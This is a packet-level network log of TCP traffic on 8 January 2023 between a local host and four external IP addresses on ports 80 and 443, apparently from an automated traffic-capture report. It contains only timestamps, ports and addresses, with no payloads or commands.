Jan 8, 2023 16:15:22.950596094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950609922 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950628996 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950638056 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950649977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950670004 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950675964 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950704098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950706005 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950726986 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950747013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950764894 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950783968 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950784922 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950803995 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950817108 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950822115 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950841904 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950855017 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950862885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950876951 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950885057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950938940 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.950944901 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950968981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950989008 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.950992107 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951009989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951030970 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951031923 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951052904 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951071024 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951071024 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951092958 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951112032 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951112032 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951132059 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951152086 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951159954 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951180935 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951206923 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951220989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951242924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951265097 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951275110 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951284885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951306105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951309919 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951325893 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951345921 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951356888 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951365948 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951386929 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951406002 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951411963 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951419115 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951433897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951447010 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951459885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951478958 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951497078 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951514006 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951517105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951543093 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951554060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951565027 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951576948 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951597929 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951626062 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951634884 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951654911 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951674938 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951682091 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951710939 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951721907 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951731920 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951751947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951770067 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951781988 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951791048 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951823950 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951824903 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951845884 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951868057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951875925 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951889992 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951910019 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951920033 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951930046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951951981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951965094 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.951972961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951992989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.951997995 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952013969 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952032089 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952033997 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952053070 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952085972 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952088118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952124119 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952138901 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952172995 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952208042 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952219009 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952228069 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952248096 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952266932 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952267885 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952286959 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952306986 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952318907 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952330112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952351093 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952352047 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952373028 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952392101 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952395916 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952413082 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952433109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952450991 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952456951 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952471972 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952482939 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952507973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952519894 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952528954 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952548981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952580929 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952583075 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952620983 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952640057 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952641010 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952677965 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952687025 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.952698946 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952718019 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.952744007 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:23.080414057 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:29.101054907 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.156909943 CET	80	49699	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:29.159589052 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.160629988 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.160784006 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.215876102 CET	80	49699	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:29.397022963 CET	80	49699	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:29.397218943 CET	80	49699	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:29.397322893 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.397357941 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.397520065 CET	49699	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:29.457015991 CET	80	49699	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:29.971096039 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:30.165215969 CET	80	49700	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:30.165405989 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:30.165611029 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:30.165637016 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:30.368766069 CET	80	49700	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:31.029139996 CET	80	49700	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:31.029460907 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:31.037059069 CET	80	49700	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:31.037281990 CET	49700	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:31.082079887 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.082159042 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.082268953 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.085181952 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.085247040 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.167160034 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.167372942 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.172558069 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.172601938 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.173199892 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.211968899 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.212013960 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.222526073 CET	80	49700	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:31.249372959 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.249434948 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.249447107 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.249573946 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.249629021 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.276900053 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277050972 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.277081966 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277117968 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277169943 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277206898 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.277225018 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277240038 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.277287960 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.277374029 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.277389050 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.304899931 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305141926 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.305191040 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305244923 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305301905 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305326939 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.305346012 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305365086 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.305619001 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.305757046 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.305775881 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.306009054 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.306127071 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.306149960 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.306478977 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.306595087 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.306612968 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.334773064 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.334966898 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335011959 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335053921 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335103035 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335131884 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335195065 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335222006 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335279942 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335433006 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335454941 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335481882 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335546017 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335567951 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335567951 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335602999 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335675955 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335691929 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335747004 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335808039 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.335823059 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.335927963 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336020947 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336039066 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336110115 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336174965 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336189032 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336241961 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336301088 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336316109 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336391926 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336457014 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336472988 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336544991 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336627007 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336644888 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336796999 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.336893082 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.336910009 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.364435911 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.364625931 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.364651918 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.364835978 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.364934921 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.364948034 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365073919 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365149021 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365169048 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.365187883 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365227938 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.365286112 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365370989 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.365386009 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365536928 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365634918 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.365647078 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365847111 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.365959883 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.365972042 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366027117 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366108894 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.366122961 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366266012 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366449118 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366453886 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.366475105 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366544008 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.366683006 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366777897 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.366796017 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366914034 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.366993904 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.367007017 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367372990 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367485046 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.367500067 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367649078 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367729902 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.367747068 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367886066 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.367957115 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.367974043 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368048906 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368154049 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.368171930 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368297100 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368392944 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.368411064 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368496895 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368747950 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368772030 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.368787050 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.368839979 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.368978977 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.369071960 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.369085073 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.369218111 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.369307995 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.369319916 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.369407892 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.369498968 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.369510889 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.392581940 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.392791986 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.392798901 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.392860889 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.392910004 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.394634008 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.394789934 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.394826889 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.394867897 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.394944906 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.397233009 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397397995 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.397448063 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397483110 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397574902 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.397597075 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397671938 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397753000 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.397773027 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397912979 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.397993088 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.398013115 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398113012 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398188114 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.398211002 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398303986 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398374081 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.398395061 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398526907 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398612022 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.398638964 CET	443	49701	5.135.247.111	192.168.2.4
